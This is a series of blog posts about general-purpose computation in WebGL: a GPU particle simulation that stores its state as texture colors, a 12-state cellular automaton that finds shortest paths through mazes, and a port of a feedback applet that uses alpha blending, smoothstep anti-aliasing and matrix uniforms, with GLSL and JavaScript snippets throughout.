On a modern GPU, it can simulate and draw over 4 million particles at 60 frames per second. Keep in mind that this is a JavaScript application, I haven’t really spent time optimizing the shaders, and it’s living within the constraints of WebGL rather than something more suitable for general computation, like OpenCL or at least desktop OpenGL.

Encoding Particle State as Color

Just as with the Game of Life and path finding projects, simulation state is stored in pairs of textures and the majority of the work is done by a fragment shader mapped between them pixel-to-pixel. I won’t repeat myself with the details of setting this up, so refer to the Game of Life article if you need to see how it works.

For this simulation, there are four of these textures instead of two: a pair of position textures and a pair of velocity textures. Why pairs of textures? There are 4 channels, so every one of these components (x, y, dx, dy) could be packed into its own color channel. This seems like the simplest solution.

The problem with this scheme is the lack of precision. With the R8G8B8A8 internal texture format, each channel is one byte. That’s 256 total possible values. The display area is 800 by 600 pixels, so not even every position on the display would be possible. Fortunately, two bytes, for a total of 65,536 values, is plenty for our purposes.

The next problem is how to encode values across these two channels. It needs to cover negative values (negative velocity) and it should try to take full advantage of dynamic range, i.e. try to spread usage across all of those 65,536 values.

To encode a value, multiply the value by a scalar to stretch it over the encoding’s dynamic range. The scalar is selected so that the required highest values (the dimensions of the display) are the highest values of the encoding.

Next, add half the dynamic range to the scaled value. This converts all negative values into positive values with 0 representing the lowest value. This representation is called Excess-K. The downside to this is that clearing the texture (glClearColor) with transparent black no longer sets the decoded values to 0.

Finally, treat each channel as a digit of a base-256 number. The OpenGL ES 2.0 shader language has no bitwise operators, so this is done with plain old division and modulus. I made an encoder and decoder in both JavaScript and GLSL. JavaScript needs it to write the initial values and, for debugging purposes, so that it can read back particle positions.

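vec2 encode(float value) {
    // Stretch over the dynamic range, then shift so negatives become positive.
    value = value * scale + OFFSET;
    float x = mod(value, BASE);     // low digit
    float y = floor(value / BASE);  // high digit
    return vec2(x, y) / BASE;       // normalize each digit for a color channel
}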

float decode(vec2 channels) {
    return (dot(channels, vec2(BASE, BASE * BASE)) - OFFSET) / scale;
}

And JavaScript. Unlike normalized GLSL values above (0.0-1.0), this produces one-byte integers (0-255) for packing into typed arrays.

function encode(value, scale) {
    var b = Particles.BASE;
    value = value * scale + b * b / 2;
    var pair = [
        Math.floor((value % b) / b * 255),
        Math.floor(Math.floor(value / b) / b * 255)
    ];
    return pair;
}

function decode(pair, scale) {
    var b = Particles.BASE;
    return (((pair[0] / 255) * b +
             (pair[1] / 255) * b * b) - b * b / 2) / scale;
}
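
To make the three steps concrete (scale, offset, split into digits), here is a simplified, integer-only sketch of the same idea. It is not the demo's encoder: the names encodeSketch and decodeSketch, the choice of BASE = 256, and the example scale of 40 (which fits positions up to about ±800 pixels into 16 bits) are all assumptions for illustration.

```javascript
// Illustrative sketch only; BASE = 256 and the function names are assumptions.
const BASE = 256;
const OFFSET = BASE * BASE / 2; // half the dynamic range (the Excess-K bias)

function encodeSketch(value, scale) {
    // Stretch, bias, then clamp into the representable 16-bit range.
    let v = Math.round(value * scale) + OFFSET;
    v = Math.min(BASE * BASE - 1, Math.max(0, v));
    // Low digit first, high digit second, each one byte (0-255).
    return [v % BASE, Math.floor(v / BASE)];
}

function decodeSketch(pair, scale) {
    return (pair[0] + pair[1] * BASE - OFFSET) / scale;
}
```

With a scale of 40, a value of 0 lands in the middle of the range (high byte 128), while an all-zero pixel decodes to the most negative value. That is the clearing caveat mentioned earlier.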

The fragment shader that updates each particle samples the position and velocity textures at that particle’s “index”, decodes their values, operates on them, then encodes them back into a color for writing to the output texture. Since I’m using WebGL, which lacks multiple rendering targets (despite having support for gl_FragData), the fragment shader can only output one color. Position is updated in one pass and velocity in another as two separate draws. The buffers are not swapped until after both passes are done, so the velocity shader (intentionally) doesn’t use the updated position values.

There’s a limit to the maximum texture size, typically 8,192 or 4,096, so rather than lay the particles out in a one-dimensional texture, the texture is kept square. Particles are indexed by two-dimensional coordinates.

It’s pretty interesting to see the position or velocity textures drawn directly to the screen rather than the normal display. It’s another domain through which to view the simulation, and it even helped me identify some issues that were otherwise hard to see. The output is a shimmering array of color, but with definite patterns, revealing a lot about the entropy (or lack thereof) of the system. I’d share a video of it, but it would be even more impractical to encode than the normal display. Here are screenshots instead: position, then velocity. The alpha component is not captured here.

Entropy Conservation

One of the biggest challenges with running a simulation like this on a GPU is the lack of random values. There’s no rand() function in the shader language, so the whole thing is deterministic by default. All entropy comes from the initial texture state filled by the CPU. When particles clump up and match state, perhaps from flowing together over an obstacle, it can be difficult to work them back apart since the simulation handles them identically.

To mitigate this problem, the first rule is to conserve entropy whenever possible. When a particle falls out of the bottom of the display, it’s “reset” by moving it back to the top. If this is done by setting the particle’s Y value to 0, then information is destroyed. This must be avoided! Particles below the bottom edge of the display tend to have slightly different Y values, despite exiting during the same iteration. Instead of resetting to 0, a constant value is added: the height of the display. The Y values remain different, so these particles are more likely to follow different routes when bumping into obstacles.

The next technique I used is to supply a single fresh random value via a uniform for each iteration. This value is added to the position and velocity of reset particles. The same value is used for all particles for that particular iteration, so this doesn’t help with overlapping particles, but it does help to break apart “streams”. These are clearly-visible lines of particles all following the same path. Each exits the bottom of the display on a different iteration, so the random value separates them slightly. Ultimately this stirs a few bits of fresh entropy into the simulation on each iteration.

Alternatively, a texture containing random values could be supplied to the shader. The CPU would have to frequently fill and upload the texture, plus there’s the issue of choosing where to sample the texture, itself requiring a random value.

Finally, to deal with particles that have exactly overlapped, the particle’s unique two-dimensional index is scaled and added to the position and velocity when resetting, teasing them apart. The random value’s sign is multiplied by the index to avoid bias in any particular direction.
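
The reset techniques above can be sketched on the CPU. This is a plain JavaScript illustration for the position only, not the demo's shader: the function name resetParticle, the y-up convention with the bottom edge at 0, and the INDEX_SCALE constant are assumptions.

```javascript
// Illustrative sketch; resetParticle, INDEX_SCALE, and the y-up convention
// (bottom edge at y = 0) are assumptions, not the demo's shader code.
const INDEX_SCALE = 0.001;

function resetParticle(p, index, random, worldHeight) {
    if (p.y >= 0) return p;            // still on screen, nothing to do
    const sign = random < 0 ? -1 : 1;  // sign of this iteration's random value
    return {
        x: p.x + random + sign * index.x * INDEX_SCALE,
        // Add the height instead of assigning a constant, so particles that
        // left with different y values keep that difference.
        y: p.y + worldHeight + random + sign * index.y * INDEX_SCALE
    };
}
```

Two particles that exit at y = -0.25 and y = -1.5 stay 1.25 apart after the reset, and two particles with identical state but different indexes end up at slightly different positions.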

To see all this in action in the demo, make a big bowl to capture all the particles, getting them to flow into a single point. This removes all entropy from the system. Now clear the obstacles. They’ll all fall down in a single, tight clump. It will still be somewhat clumped when resetting at the top, but you’ll see them spraying apart a little bit (particle indexes being added). These will exit the bottom at slightly different times, so the random value plays its part to work them apart even more. After a few rounds, the particles should be pretty evenly spread again.

The last source of entropy is your mouse. When you move it through the scene you disturb particles and introduce some noise to the simulation.

Textures as Vertex Attribute Buffers

This project idea occurred to me while reading the OpenGL ES shader language specification (PDF). I’d been wanting to do a particle system, but I was stuck on the problem of how to draw the particles. The texture data representing positions needs to somehow be fed back into the pipeline as vertices. Normally a buffer texture (a texture backed by an array buffer) or a pixel buffer object (asynchronous texture data copying) might be used for this, but WebGL has none of these features. Pulling texture data off the GPU and putting it all back on as an array buffer on each frame is out of the question.

However, I came up with a cool technique that’s better than both those anyway. The shader function texture2D is used to sample a pixel in a texture. Normally this is used by the fragment shader as part of the process of computing a color for a pixel. But the shader language specification mentions that texture2D is available in vertex shaders, too. That’s when it hit me. The vertex shader itself can perform the conversion from texture to vertices.

It works by passing the previously-mentioned two-dimensional particle indexes as the vertex attributes, using them to look up particle positions from within the vertex shader. The shader would run in GL_POINTS mode, emitting point sprites. Here’s the abridged version:

attribute vec2 index;

uniform sampler2D positions;
uniform vec2 statesize;
uniform vec2 worldsize;
uniform float size;

// float decode(vec2) { ...

void main() {
    vec4 psample = texture2D(positions, index / statesize);
    vec2 p = vec2(decode(psample.rg), decode(psample.ba));
    gl_Position = vec4(p / worldsize * 2.0 - 1.0, 0, 1);
    gl_PointSize = size;
}

The real version also samples the velocity since it modulates the color (slow moving particles are lighter than fast moving particles).
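
On the JavaScript side, the index attribute is just a list of (x, y) pairs, one per particle. A minimal sketch of building it, assuming a hypothetical helper named particleIndexes and a state texture of width by height particles:

```javascript
// Illustrative sketch; particleIndexes is a hypothetical helper name.
function particleIndexes(width, height) {
    const indexes = new Float32Array(width * height * 2);
    let i = 0;
    for (let y = 0; y < height; y++) {
        for (let x = 0; x < width; x++) {
            indexes[i++] = x;  // column in the state texture
            indexes[i++] = y;  // row in the state texture
        }
    }
    return indexes;
}
```

Since the indexes never change, an array like this would only need to be uploaded once as a static array buffer, with two components per vertex.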

However, there’s a catch: implementations are allowed to limit the number of vertex shader texture bindings to 0 (GL_MAX_VERTEX_TEXTURE_IMAGE_UNITS). So technically vertex shaders must always support texture2D, but they’re not required to support actually having textures. It’s sort of like food service on an airplane that doesn’t carry passengers. These platforms don’t support this technique. So far I’ve only had this problem on some mobile devices.
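
A program can detect this up front by querying the limit. A minimal sketch, where supportsVertexTextures is a hypothetical helper name and gl is a WebGL rendering context:

```javascript
// gl is a WebGLRenderingContext; supportsVertexTextures is a hypothetical name.
function supportsVertexTextures(gl) {
    // Zero means texture2D compiles in a vertex shader but has nothing to sample.
    return gl.getParameter(gl.MAX_VERTEX_TEXTURE_IMAGE_UNITS) > 0;
}
```

If this returns false, the technique described here can't be used on that platform and the page would need some fallback or an error message.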

Outside of the lack of support by some platforms, this allows every part of the simulation to stay on the GPU and paves the way for a pure GPU particle system.

Obstacles

An important observation is that particles do not interact with each other. This is not an n-body simulation. They do, however, interact with the rest of the world: they bounce intuitively off those static circles. This environment is represented by another texture, one that’s not updated during normal iteration. I call this the obstacle texture.

The colors on the obstacle texture are surface normals. That is, each pixel has a direction to it, a flow directing particles in some direction. Empty space has a special normal value of (0, 0). This is not normalized (doesn’t have a length of 1), so it’s an out-of-band value that has no effect on particles.

(I didn’t realize until I was done how much this looks like the Greendale Community College flag.)

A particle checks for a collision simply by sampling the obstacle texture. If it finds a normal at its location, it changes its velocity using the shader function reflect. This function is normally used for reflecting light in a 3D scene, but it works equally well for slow-moving particles. The effect is that particles bounce off the circle in a natural way.
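
For reference, GLSL defines reflect(I, N) as I - 2 * dot(N, I) * N. Here is the same formula as a small JavaScript sketch for 2D vectors stored as two-element arrays (the array representation is just for illustration):

```javascript
// JavaScript equivalent of GLSL's reflect(I, N) for 2D vectors.
// N is expected to be unit length for a true mirror reflection.
function reflect(i, n) {
    const d = i[0] * n[0] + i[1] * n[1];  // dot(N, I)
    return [i[0] - 2 * d * n[0], i[1] - 2 * d * n[1]];
}
```

A particle falling down and to the right, (1, -1), that hits a surface whose normal points straight up, (0, 1), leaves with velocity (1, 1). With a zero normal the formula returns the velocity unchanged.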

Sometimes particles end up on/in an obstacle with a low or zero velocity. To dislodge these they’re given a little nudge in the direction of the normal, pushing them away from the obstacle. You’ll see this on slopes where slow particles jiggle their way down to freedom like jumping beans.

To make the obstacle texture user-friendly, the actual geometry is maintained on the CPU side of things in JavaScript. It keeps a list of these circles and, on updates, redraws the obstacle texture from this list. This happens, for example, every time you move your mouse on the screen, providing a moving obstacle. The texture provides shader-friendly access to the geometry. Two representations for two purposes.

When I started writing this part of the program, I envisioned that shapes other than circles could be placed, too. For example, solid rectangles: the normals would look something like this.

So far these are unimplemented.

Future Ideas

I didn’t try it yet, but I wonder if particles could interact with each other by also drawing themselves onto the obstacles texture. Two nearby particles would bounce off each other. Perhaps the entire liquid demo could run on the GPU like this. If I’m imagining it correctly, particles would gain volume and obstacles forming bowl shapes would fill up rather than concentrate particles into a single point.

I think there’s still some more to explore with this project.

A GPU Approach to Path Finding

2014-06-22T22:51:46Z

Last time I demonstrated how to run Conway’s Game of Life entirely on a graphics card. This concept can be generalized to any cellular automaton, including automata with more than two states. In this article I’m going to exploit this to solve the shortest path problem for two-dimensional grids entirely on a GPU. It will be just as fast as traditional searches on a CPU.

The JavaScript side of things is essentially the same as before — two textures with fragment shader in between that steps the automaton forward — so I won’t be repeating myself. The only parts that have changed are the cell state encoding (to express all automaton states) and the fragment shader (to code the new rules).

Online Demo (source)

Included is a pure JavaScript implementation of the cellular automaton (State.js) that I used for debugging and experimentation, but it doesn’t actually get used in the demo. A fragment shader (12state.frag) encodes the full automaton rules for the GPU.

Maze-solving Cellular Automaton

There’s a dead simple 2-state cellular automaton that can solve any perfect maze of arbitrary dimension. Each cell is either OPEN or a WALL, only 4-connected neighbors are considered, and there’s only one rule: if an OPEN cell has only one OPEN neighbor, it becomes a WALL.

On each step the dead ends collapse towards the solution. In the above GIF, in order to keep the start and finish from collapsing, I’ve added a third state (red) that holds them open. On a GPU, you’d have to do as many draws as the length of the longest dead end.
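
Here's a minimal CPU sketch of that automaton. The numeric state values, the name HOLD for the third state, and treating everything outside the grid as WALL are assumptions for illustration. Like the GPU version, each step reads only the old grid and writes a new one.

```javascript
// Illustrative sketch; state values and the HOLD name are assumptions.
const WALL = 0, OPEN = 1, HOLD = 2;
const DIRS = [[0, -1], [1, 0], [0, 1], [-1, 0]];  // 4-connected neighbors

function stepDeadEnds(grid) {
    const h = grid.length, w = grid[0].length;
    // Cells outside the grid count as walls.
    const passable = (x, y) =>
        x >= 0 && y >= 0 && x < w && y < h && grid[y][x] !== WALL;
    return grid.map((row, y) => row.map((cell, x) => {
        if (cell !== OPEN) return cell;  // WALL and HOLD never change
        const n = DIRS.filter(([dx, dy]) => passable(x + dx, y + dy)).length;
        return n === 1 ? WALL : OPEN;    // a dead end collapses
    }));
}
```

A dead-end corridor of length k needs k calls before it has fully collapsed, which is the per-draw cost mentioned above.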

A perfect maze is a maze where there is exactly one solution. This technique doesn’t work for mazes with multiple solutions, loops, or open spaces. The extra solutions won’t collapse into one, let alone the shortest one.

To fix this we need a more advanced cellular automaton.

Path-solving Cellular Automaton

I came up with a 12-state cellular automaton that can not only solve mazes, but will specifically find the shortest path. Like above, it only considers 4-connected neighbors.

OPEN (white): passable space in the maze
WALL (black): impassable space in the maze
BEGIN (red): starting position
END (red): goal position
FLOW (green): flood fill that comes in four flavors: north, east, south, west
ROUTE (blue): shortest path solution, also comes in four flavors

If we wanted to consider 8-connected neighbors, everything would be the same, but it would require 20 states (n, ne, e, se, s, sw, w, nw) instead of 12. The rules are still pretty simple.

WALL and ROUTE cells never change state.
OPEN becomes FLOW if it has any adjacent FLOW cells. It points towards the neighboring FLOW cell (n, e, s, w).
END becomes ROUTE if adjacent to a FLOW cell. It points towards the FLOW cell (n, e, s, w). This rule is important for preventing multiple solutions from appearing.
FLOW becomes ROUTE if adjacent to a ROUTE cell that points towards it. Combined with the above rule, it means when a FLOW cell touches a ROUTE cell, there’s a cascade.
BEGIN becomes ROUTE when adjacent to a ROUTE cell. The direction is unimportant. This rule isn’t strictly necessary but will come in handy later.
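
These rules translate fairly directly into a per-cell update function. The sketch below is plain JavaScript, not the demo's State.js or 12state.frag. The numeric state values, the n, e, s, w tie-break order, treating out-of-bounds cells as WALL, letting BEGIN seed the flood, keeping a FLOW cell's direction when it becomes ROUTE, and having BEGIN point at its ROUTE neighbor are all assumptions that the rules leave open.

```javascript
// Illustrative sketch of the 12-state rules; encodings are assumptions.
const OPEN = 0, WALL = 1, BEGIN = 2, END = 3;
const FLOW = 4;   // FLOW + d,  d = 0..3 for n, e, s, w
const ROUTE = 8;  // ROUTE + d, d = 0..3 for n, e, s, w
const DX = [0, 1, 0, -1];
const DY = [-1, 0, 1, 0];
const isFlow = (s) => s >= FLOW && s < ROUTE;
const isRoute = (s) => s >= ROUTE;

function step(grid) {
    const h = grid.length, w = grid[0].length;
    const at = (x, y) =>
        (x < 0 || y < 0 || x >= w || y >= h) ? WALL : grid[y][x];
    return grid.map((row, y) => row.map((cell, x) => {
        for (let d = 0; d < 4; d++) {
            const n = at(x + DX[d], y + DY[d]);
            const source = isFlow(n) || n === BEGIN;  // assumption: BEGIN seeds
            if (cell === OPEN && source) return FLOW + d;
            if (cell === END && source) return ROUTE + d;
            // The neighbor in direction d points back at us if its own
            // direction is the opposite of d.
            if (isFlow(cell) && isRoute(n) && n - ROUTE === (d + 2) % 4) {
                return ROUTE + (cell - FLOW);
            }
            if (cell === BEGIN && isRoute(n)) return ROUTE + d;
        }
        return cell;  // WALL, ROUTE, and anything with no matching rule
    }));
}
```

On a one-row corridor [BEGIN, OPEN, OPEN, END], six calls to step turn every cell into ROUTE: three for the flood to reach END and three for the route to trace back.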

This can be generalized for cellular grids of any arbitrary dimension, and it could even run on a GPU for higher dimensions, limited primarily by the number of texture uniform bindings (2D needs 1 texture binding, 3D needs 2 texture bindings, 4D needs 8 texture bindings … I think). But if you need to find the shortest path along a five-dimensional grid, I’d like to know why!

So what does it look like?

FLOW cells flood the entire maze. Branches of the maze are searched in parallel as they’re discovered. As soon as an END cell is touched, a ROUTE is traced backwards along the flow to the BEGIN cell. It requires twice as many steps as the length of the shortest path.

Note that the FLOW cells keep flooding the maze even after the END was found. It’s a cellular automaton, so there’s no way to communicate to these other cells that the solution was discovered. However, when running on a GPU this wouldn’t matter anyway. There’s no bailing out early before all the fragment shaders have run.

What’s great about this is that we’re not limited to mazes whatsoever. Here’s a path through a few connected rooms with open space.

Maze Types

The worst-case solution is the longest possible shortest path. There’s only one frontier and running the entire automaton to push it forward by one cell is inefficient, even for a GPU.

The way a maze is generated plays a large role in how quickly the cellular automaton can solve it. A common maze generation algorithm is a random depth-first search (DFS). The entire maze starts out entirely walled in and the algorithm wanders around at random plowing down walls, but never breaking into open space. When it comes to a dead end, it unwinds looking for new walls to knock down. This method tends towards long, winding paths with a low branching factor.

The mazes you see in the demo are Kruskal’s algorithm mazes. Walls are knocked out at random anywhere in the maze, without breaking the perfect maze rule. It has a much higher branching factor and makes for a much more interesting demo.

Skipping the Route Step

On my computers, with a 1023x1023 Kruskal maze ~~it’s about an order of magnitude slower~~ (see update below) than A* (rot.js’s version) for the same maze. ~~Not very impressive!~~ I believe this gap will close with time, as GPUs gain parallelism faster than CPUs gain speed. However, there’s something important to consider: it’s not only solving the shortest path between source and goal, it’s finding the shortest path between the source and any other point. At its core it’s a breadth-first grid search.

Update: One day after writing this article I realized that glReadPixels was causing a gigantic bottleneck. By only checking for the end conditions once every 500 iterations, this method is now as fast as A* on modern graphics cards, despite taking up to an extra 499 iterations. In just a few more years, this technique should be faster than A*.
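
The polling pattern itself is simple. In this sketch, runWithPolling, step, and isDone are hypothetical names: step stands in for one draw of the automaton and isDone for the expensive glReadPixels-based check.

```javascript
// Illustrative sketch; all names here are hypothetical.
function runWithPolling(step, isDone, interval, maxSteps) {
    let steps = 0;
    while (steps < maxSteps) {
        for (let i = 0; i < interval; i++) step();  // cheap: stays on the GPU
        steps += interval;
        if (isDone()) break;  // expensive: would stall on a readback
    }
    return steps;
}
```

If the solution actually appears after 1,203 steps and the interval is 500, this runs 1,500 steps: 297 wasted iterations in exchange for three readbacks instead of 1,203.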

Really, there’s little use in the ROUTE step. It’s a poor fit for the GPU. It has no use in any real application. I’m using it here mainly for demonstration purposes. If dropped, the cellular automaton would become 6 states: OPEN, WALL, and four flavors of FLOW. Seed the source point with a FLOW cell (arbitrary direction) and run the automaton until all of the OPEN cells are gone.

Detecting End State

The ROUTE cells do have a useful purpose, though. How do we know when we’re done? We can poll the BEGIN cell to check for when it becomes a ROUTE cell. Then we know we’ve found the solution. This doesn’t necessarily mean all of the FLOW cells have finished propagating, though, especially in the case of a DFS-maze.

In a CPU-based solution, I’d keep a counter and increment it every time an OPEN cell changes state. If the counter doesn’t change after an iteration, I’m done. OpenGL 4.2 introduces an atomic counter that could serve this role, but this isn’t available in OpenGL ES / WebGL. The only thing left to do is use glReadPixels to pull down the entire thing and check for end state on the CPU.

The original 2-state automaton above also suffers from this problem.

Encoding Cell State

Cells are stored per pixel in a GPU texture. I spent quite some time trying to brainstorm a clever way to encode the twelve cell states into a vec4 color. Perhaps there’s some way to exploit blending to update cell states, or make use of some other kind of built-in pixel math. I couldn’t think of anything better than a straightforward encoding of 0 to 11 into a single color channel (red in my case).

int state(vec2 offset) {
    vec2 coord = (gl_FragCoord.xy + offset) / scale;
    vec4 color = texture2D(maze, coord);
    return int(color.r * 11.0 + 0.5);
}

This leaves three untouched channels for other useful information. I experimented (uncommitted) with writing distance in the green channel. When an OPEN cell becomes a FLOW cell, it adds 1 to its adjacent FLOW cell distance. I imagine this could be really useful in a real application: put your map on the GPU, run the cellular automaton a sufficient number of times, pull the map back off (glReadPixels), and for every point you know both the path and total distance to the source point.
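
On the CPU side, seeding the maze texture or reading it back with glReadPixels needs the same mapping between a state number and a red byte. A minimal sketch, assuming states are spread evenly across 0 to 255 to match the shader's state() function; the helper names are hypothetical.

```javascript
// Illustrative sketch; helper names are hypothetical.
const STATES = 12;

// State number (0-11) to the red byte written into the texture.
function stateToByte(state) {
    return Math.round(state / (STATES - 1) * 255);
}

// Red byte read back from the texture to a state number, mirroring
// int(color.r * 11.0 + 0.5) where color.r is byte / 255.
function byteToState(byte) {
    return Math.floor(byte / 255 * (STATES - 1) + 0.5);
}
```

The rounding on both sides leaves about 23 byte values between adjacent states, so small precision differences in the sampled color don't change the decoded state.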

Performance

As mentioned above, I ran the GPU maze-solver against A* to test its performance. I didn’t yet try running it against Dijkstra’s algorithm on a CPU over the entire grid (one source, many destinations). If I had to guess, I’d bet the GPU would come out on top for grids with a high branching factor (open spaces, etc.) so that its parallelism is most effectively exploited, but Dijkstra’s algorithm would win in all other cases.

Overall this is more of a proof of concept than a practical application. It’s proof that we can trick OpenGL into solving mazes for us!

Feedback Applet Ported to WebGL

2014-06-21T02:49:57Z

The biggest flaw with so many OpenGL tutorials is trying to teach two complicated topics at once: the OpenGL API and 3D graphics. These are only loosely related and do not need to be learned simultaneously. It’s far more valuable to focus on the fundamentals, which can only happen when handled separately. With the programmable pipeline, OpenGL is useful for a lot more than 3D graphics. There are many non-3D directions that tutorials can take.

I think that’s why I’ve been enjoying my journey through WebGL so much. Except for my sphere demo, which was only barely 3D, none of my projects have been what would typically be considered 3D graphics. Instead, each new project has introduced me to some new aspect of OpenGL, accidentally playing out like a great tutorial. I started out drawing points and lines, then took a dive into non-trivial fragment shaders, then textures and framebuffers, then the depth buffer, then general computation with fragment shaders.

The next project introduced me to alpha blending. I ported my old feedback applet to WebGL!

https://skeeto.github.io/Feedback/webgl/ (source)

Since finishing the port I’ve already spent a couple of hours just playing with it. It’s mesmerizing. Here’s a video demonstration in case WebGL doesn’t work for you yet. I’m manually driving it to show off the different things it can do.

Drawing a Frame

On my laptop, the original Java version plods along at about 6 frames per second. That’s because it does all of the compositing on the CPU. Each frame it has to blend over 1.2 million color components. This is exactly the sort of thing the GPU is built to do. The WebGL version does the full 60 frames per second (i.e. requestAnimationFrame) without breaking a sweat. The CPU only computes a couple of 3x3 affine transformation matrices per frame: virtually nothing.

Similar to my WebGL Game of Life, there’s a texture stored on the GPU that holds almost all the system state. It’s the same size as the display. To draw the next frame, this texture is drawn to the display directly, then transformed (rotated and scaled down slightly), and drawn again to the display. This is the “feedback” part and it’s where blending kicks in. It’s the core component of the whole project.

Next, some fresh shapes are drawn to the display (e.g. the circle for the mouse cursor) and the entire thing is captured back onto the state texture with glCopyTexImage2D, to be used for the next frame. It’s important that glCopyTexImage2D is called before returning to the JavaScript top-level (back to the event loop), because the screen data will no longer be available at that point, even if it’s still visible on the screen.

Alpha Blending

They say a picture is worth a thousand words, and that’s literally true with the Visual glBlendFunc + glBlendEquation Tool. A few minutes playing with that tool tells you pretty much everything you need to know.

While you could potentially perform blending yourself in a fragment shader with multiple draw calls, it’s much better (and faster) to configure OpenGL to do it. There are two functions to set it up: glBlendFunc and glBlendEquation. There are also “separate” versions of all this for specifying color channels separately, but I don’t need that for this project.

The enumeration passed to glBlendEquation decides how the colors are combined. In WebGL our options are GL_FUNC_ADD (a + b), GL_FUNC_SUBTRACT (a - b), GL_FUNC_REVERSE_SUBTRACT (b - a). In regular OpenGL there’s also GL_MIN (min(a, b)) and GL_MAX (max(a, b)).

The function glBlendFunc takes two enumerations, choosing how the alpha channels are applied to the colors before the blend equation (above) is applied. The alpha channel could be ignored and the color used directly (GL_ONE) or discarded (GL_ZERO). The alpha channel could be multiplied directly (GL_SRC_ALPHA, GL_DST_ALPHA), or inverted first (GL_ONE_MINUS_SRC_ALPHA). In WebGL there are 72 possible combinations.

gl.enable(gl.BLEND);
gl.blendEquation(gl.FUNC_ADD);
gl.blendFunc(gl.SRC_ALPHA, gl.SRC_ALPHA);

In this project I’m using GL_FUNC_ADD and GL_SRC_ALPHA for both source and destination. The alpha value put out by the fragment shader is the experimentally-determined, magical value of 0.62. A little higher and the feedback tends to blend towards bright white really fast. A little lower and it blends away to nothing really fast. It’s a numerical instability that has the interesting side effect of making the demo behave slightly differently depending on the floating point precision of the GPU running it!
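
The per-channel arithmetic behind gl.blendEquation(gl.FUNC_ADD) with gl.blendFunc(gl.SRC_ALPHA, gl.SRC_ALPHA) can be written out as a small sketch. The function name blendAdd is hypothetical, and the clamp assumes an ordinary fixed-point color buffer.

```javascript
// Per-channel result of FUNC_ADD with SRC_ALPHA as both factors:
// the incoming and the existing color are each scaled by the source alpha.
function blendAdd(src, dst, srcAlpha) {
    const sum = src * srcAlpha + dst * srcAlpha;
    return Math.min(1, Math.max(0, sum));  // color buffers clamp to [0, 1]
}
```

As a rough illustration only: if a uniform color c were drawn twice with this blend onto a cleared buffer (an assumption about the draw order, not something verified against the demo), the result would be (a + a * a) * c for alpha a. That gain is about 1.004 at a = 0.62 and crosses 1 near a = 0.618, which would be consistent with slightly higher values running away to white and slightly lower ones fading out.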

Saving a Screenshot

The HTML5 canvas object that provides the WebGL context has a toDataURL() method for grabbing the canvas contents as a friendly base64-encoded PNG image. Unfortunately this doesn’t work with WebGL unless the preserveDrawingBuffer option is set, which can introduce performance issues. Without this option, the browser is free to throw away the drawing buffer before the next JavaScript turn, making the pixel information inaccessible.

By coincidence there’s a really convenient workaround for this project. Remember that state texture? That’s exactly what we want to save. I can attach it to a framebuffer and use glReadPixels just like I did in WebGL Game of Life to grab the simulation state. The pixel data is then drawn to a background canvas (without using WebGL) and toDataURL() is used on that canvas to get a PNG image. I slap this on a link with the new download attribute and call it done.

Anti-aliasing

At the time of this writing, support for automatic anti-aliasing in WebGL is sparse at best. I’ve never seen it working anywhere yet, in any browser on any platform. GL_SMOOTH isn’t available and the anti-aliasing context creation option doesn’t do anything on any of my computers. Fortunately I was able to work around this using a cool smoothstep trick.

The article I linked explains it better than I could, but here’s the gist of it. This shader draws a circle in a quad, but leads to jagged, sharp edges.

uniform vec4 color;
varying vec3 coord;  // object space

void main() {
    if (distance(coord.xy, vec2(0, 0)) < 1.0) {
        gl_FragColor = color;
    } else {
        gl_FragColor = vec4(0, 0, 0, 1);
    }
}

The improved version uses smoothstep to fade from inside the circle to outside the circle. Not only does it look nicer on the screen, I think it looks nicer as code, too. Unfortunately WebGL has no fwidth function as explained in the article, so the delta is hardcoded.

uniform vec4 color;
varying vec3 coord;

const vec4 outside = vec4(0, 0, 0, 1);
const float delta = 0.1;

void main() {
    float dist = distance(coord.xy, vec2(0, 0));
    float a = smoothstep(1.0 - delta, 1.0, dist);
    gl_FragColor = mix(color, outside, a);
}
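
For anyone unfamiliar with smoothstep, it clamps and then applies a cubic Hermite curve. Here is the GLSL definition as a JavaScript sketch, handy for checking how a given delta shapes the edge:

```javascript
// JavaScript equivalent of GLSL's smoothstep(edge0, edge1, x).
function smoothstep(edge0, edge1, x) {
    const t = Math.min(1, Math.max(0, (x - edge0) / (edge1 - edge0)));
    return t * t * (3 - 2 * t);
}
```

With a delta of 0.1, any distance below 0.9 gives 0 (pure circle color), any distance above 1.0 gives 1 (pure outside color), and the band in between blends smoothly, passing through an even mix around 0.95.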

Matrix Uniforms

Up until this point I had avoided matrix uniforms. I was doing transformations individually within the shader. However, as transforms get more complicated, it’s much better to express the transform as a matrix and let the shader language handle matrix multiplication implicitly. Rather than pass half a dozen uniforms describing the transform, you pass a single matrix that has the full range of motion.

My Igloo WebGL library originally had a vector library that provided GLSL-style vectors, including full swizzling. My long term goal was to extend this to support GLSL-style matrices. However, writing a matrix library from scratch was turning out to be far more work than I expected. Plus it’s reinventing the wheel.

So, instead, I dropped my vector library — I completely deleted it — and decided to use glMatrix, a really solid WebGL-friendly matrix library. Highly recommended! It doesn’t introduce any new types, it just provides functions for operating on JavaScript typed arrays, the same arrays that get passed directly to WebGL functions. This composes perfectly with Igloo without making it a formal dependency.

Here’s my function for creating the mat3 uniform that transforms both the main texture as well as the individual shape sprites. This use of glMatrix looks a lot like java.awt.geom.AffineTransform, does it not? That’s one of my favorite parts of Java 2D, and I’ve been missing it.

/* Translate, scale, and rotate. */
Feedback.affine = function(tx, ty, sx, sy, a) {
    var m = mat3.create();
    mat3.translate(m, m, [tx, ty]);
    mat3.rotate(m, m, a);
    mat3.scale(m, m, [sx, sy]);
    return m;
};

The return value is just a plain Float32Array that I can pass to glUniformMatrix3fv. It becomes the placement uniform in the shader.

attribute vec2 quad;
uniform mat3 placement;
varying vec3 coord;

void main() {
    coord = vec3(quad, 0);
    vec2 position = (placement * vec3(quad, 1)).xy;
    gl_Position = vec4(position, 0, 1);
}
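
To see what that matrix contains, the translate, rotate, scale product can be written out by hand. This sketch does not use glMatrix. The names affineByHand and applyAffine are hypothetical, and the column-major layout is my understanding of what glMatrix and glUniformMatrix3fv expect.

```javascript
// Illustrative sketch; builds T * R * S directly in column-major order.
function affineByHand(tx, ty, sx, sy, a) {
    const c = Math.cos(a), s = Math.sin(a);
    return new Float32Array([
        c * sx,  s * sx, 0,  // first column
        -s * sy, c * sy, 0,  // second column
        tx,      ty,     1   // third column (translation)
    ]);
}

// What the shader's placement * vec3(x, y, 1) computes, on the CPU.
function applyAffine(m, x, y) {
    return [m[0] * x + m[3] * y + m[6],
            m[1] * x + m[4] * y + m[7]];
}
```

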